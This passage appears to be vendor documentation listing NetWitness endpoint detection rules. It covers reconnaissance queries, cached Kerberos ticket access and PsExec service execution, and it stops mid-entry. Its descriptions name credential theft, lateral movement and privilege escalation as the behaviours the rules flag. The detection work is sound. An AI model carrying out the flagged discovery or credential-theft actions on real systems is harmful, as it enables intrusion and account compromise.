Queries Users Logged On Local Systemqueries_users_logged_on_local_systemQuerying users logged on local system can be an indication of someone trying to discover potential attack vectors in the system , and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = queries users logged on local system
Queries Terminal Sessionsqueries_terminal_sessionsQuerying terminal sessions can be an indication of someone trying to discover potential attack vectors in the system , and the same can be used for further exploitation of the system

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = queries terminal sessions
Queries Registry Using Command-Line Registry Toolqueries_registry_using_command-line_registry_toolQuerying registry using command-line registry tool can be an indication of adversaries trying to interact with the Windows Registry to gather information about the system, configuration, and installed software.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = queries registry using command-line registry tool
Queries Processes On Remote Systemqueries_processes_on_remote_systemProcessing queries on remote system can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = queries processes on remote system
Queries Processes On Local Systemqueries_processes_on_local_systemProcessing queries on local system can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = queries processes on local system
Queries Cached Kerberos Ticketsqueries_cached_kerberos_ticketsQuerying cached kerberos tickets can be attempt to obtain account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = queries cached kerberos tickets
Psexesvc Runs Shell Commandspsexesvc_runs_shell_commandsPsexesvc running shell commands can be an indication of someone trying to execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. These techniques can also be used to maintain persistence or for privilege escalation

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = psexesvc runs shell commands
Psexesvc Runs Scripting Enginepsexesvc_runs_scripting_enginePsexesvc running scripting engine can be an indication of someone trying to execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. These techniques can also be used to maintain persistence or for privilege escalation

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = psexesvc runs scripting engine
Regsvr32 Creates Windows Taskregsvr32_creates_windows_taskRegsvr32.exe is a command-line program used to register and unregister object linking such as dynamic link libraries (